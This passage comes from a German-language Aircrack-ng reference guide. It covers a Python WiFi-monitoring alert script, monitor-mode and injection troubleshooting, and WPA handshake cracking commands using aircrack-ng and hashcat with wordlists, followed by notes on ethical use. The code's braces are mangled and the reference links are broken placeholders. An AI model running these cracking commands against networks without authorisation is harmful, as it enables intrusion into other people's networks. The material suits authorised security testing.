self.logger.warning(f"ALERT [\\\\{alert['severity'].upper()\\\\}]: \\\\{alert['message']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
# Send to SIEM if configured
if self.config.get('siem', \\\\{\\\\}).get('enabled', False):
self.send_siem_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
try:
email_config = self.config['email']
msg = MimeMultipart()
msg['From'] = email_config['from']
msg['To'] = email_config['to']
msg['Subject'] = f"WiFi Security Alert - \\\\{alert['type']\\\\}"
body = f"""
WiFi Security Alert
Type: \\{alert['type']\\} Severity: \\{alert['severity']\\} Message: \\{alert['message']\\} Timestamp: \\{datetime.now().isoformat()\\}
Network Details: BSSID: \\{alert['network']['bssid']\\} ESSID: \\{alert['network']['essid']\\} Channel: \\{alert['network']['channel']\\} Encryption: \\{alert['network']['privacy']\\} Power: \\{alert['network']['power']\\} dBm
This is an automated alert from the WiFi monitoring system. """
msg.attach(MimeText(body, 'plain'))
server = smtplib.SMTP(email_config['smtp_server'], email_config['port'])
if email_config.get('use_tls', True):
server.starttls()
if email_config.get('username'):
server.login(email_config['username'], email_config['password'])
server.send_message(msg)
server.quit()
except Exception as e:
self.logger.error(f"Failed to send email alert: \\\\{e\\\\}")
def send_siem_alert(self, alert):
"""Send alert to SIEM system"""
try:
import requests
siem_config = self.config['siem']
siem_event = \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'wifi_monitor',
'event_type': alert['type'],
'severity': alert['severity'],
'message': alert['message'],
'network': alert['network']
\\\\}
response = requests.post(
siem_config['url'],
json=siem_event,
headers=\\\\{'Authorization': f"Bearer \\\\{siem_config['token']\\\\}"\\\\},
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send SIEM alert: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending SIEM alert: \\\\{e\\\\}")
def run_continuous_monitoring(self):
"""Run continuous WiFi monitoring"""
self.logger.info("Starting continuous WiFi monitoring")
while True:
try:
self.logger.info("Scanning for wireless networks...")
networks = self.scan_networks()
if networks:
self.logger.info(f"Found \\\\{len(networks)\\\\} networks")
# Detect anomalies
alerts = self.detect_anomalies(networks)
# Send alerts
for alert in alerts:
self.send_alert(alert)
# Save scan results
with open('/var/log/wifi_scan_results.json', 'a') as f:
for network in networks:
f.write(json.dumps(network) + '\n')
else:
self.logger.info("No networks found")
# Wait for next scan
self.logger.info(f"Waiting \\\\{self.scan_interval\\\\} seconds for next scan...")
time.sleep(self.scan_interval)
except KeyboardInterrupt:
self.logger.info("Monitoring stopped by user")
break
except Exception as e:
self.logger.error(f"Error in monitoring loop: \\\\{e\\\\}")
time.sleep(60) # Wait before retrying
Configuration¶
config = \\{ 'interface': 'wlan0mon', 'scan_interval': 300, # 5 minutes 'email': \\{ 'enabled': True, 'smtp_server': 'smtp.company.com', 'port': 587, 'use_tls': True, 'username': 'monitor@company.com', 'password': 'password', 'from': 'wifi-monitor@company.com', 'to': 'security@company.com' \\}, 'siem': \\{ 'enabled': False, 'url': 'https://siem.company.com/api/events', 'token': 'your-api-token' \\} \\}
Usage¶
if name == "main": monitor = WiFiMonitor(config) monitor.run_continuous_monitoring() ```_
Fehlerbehebung¶
Gemeinsame Themen¶
Monitor Mode Issues: ```bash
Check if interface supports monitor mode¶
iw list|grep -A 10 "Supported interface modes"
Kill interfering processes¶
sudo airmon-ng check kill
Manually set monitor mode¶
sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up
Check monitor mode status¶
iwconfig wlan0 ```_
** Keine Netzwerke Entdeckt:** ```bash
Check interface status¶
iwconfig sudo iw dev
Verify monitor mode¶
iwconfig wlan0mon|grep Mode
Check for hardware issues¶
dmesg|grep -i wifi lsusb|grep -i wireless
Try different channels¶
sudo iwconfig wlan0mon channel 1 sudo iwconfig wlan0mon channel 6 sudo iwconfig wlan0mon channel 11 ```_
Injektionsfragen: ```bash
Test injection capability¶
sudo aireplay-ng --test wlan0mon
Check for packet injection support¶
sudo aireplay-ng --test wlan1mon
Verify driver support¶
lsmod|grep -i wireless dmesg|grep -i driver ```_
Leistungsoptimierung¶
Optimierung der Aircrack-ng Leistung:
```bash
Use multiple CPU cores for cracking¶
aircrack-ng -p 4 capture.cap
Optimize airodump-ng¶
sudo airodump-ng --band abg wlan0mon # Scan all bands sudo airodump-ng -M wlan0mon # Enable manufacturer lookup
Use faster wordlists¶
Create optimized wordlist¶
sort wordlist.txt|uniq > optimized_wordlist.txt
Use GPU acceleration with hashcat¶
aircrack-ng -J hashcat_format capture.cap hashcat -m 2500 -w 3 hashcat_format.hccapx wordlist.txt ```_
Sicherheitsüberlegungen¶
Ethische Nutzung¶
Rechtliche Erwägungen: - Nur Testnetzwerke, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - Lokale Gesetze zur drahtlosen Sicherheitsprüfung verstehen - ordnungsgemäße Genehmigung vor der Durchführung von Bewertungen erhalten - Dokumentation aller Prüftätigkeiten für die Erfüllung von Zwecken - Respektieren Sie Privatsphäre und Vertraulichkeit erfasster Daten
** Sicherheit:** - Verwenden Sie Aircrack-ng in isolierten Testumgebungen, wenn möglich - Implementierung richtiger Zugriffskontrollen für erfasste Daten - Sichere Speicherung und Übermittlung sensibler Informationen - Regelmäßige Aktualisierungen von Aircrack-ng und Abhängigkeiten - Monitor zur Erkennung durch drahtlose Intrusionserkennungssysteme
Datenschutz¶
** Erfassung der Datensicherheit:** - Verschlüsseln erfasste Handshakes und Verkehr - Implementieren Sie sichere Löschung von temporären Dateien - Verwenden Sie sichere Kanäle für die Datenübertragung - Umsetzung von Datenschutzbestimmungen - Regelmäßige Sicherheitsbewertungen der Prüfinfrastruktur
Referenzen¶
- [Amtsblatt](https://LINK_5
- (LINK_5_)
- WiFi Security Testing Guide
- (___LINK_5__)
- [IEEE 802.11 Standards](LINK_5_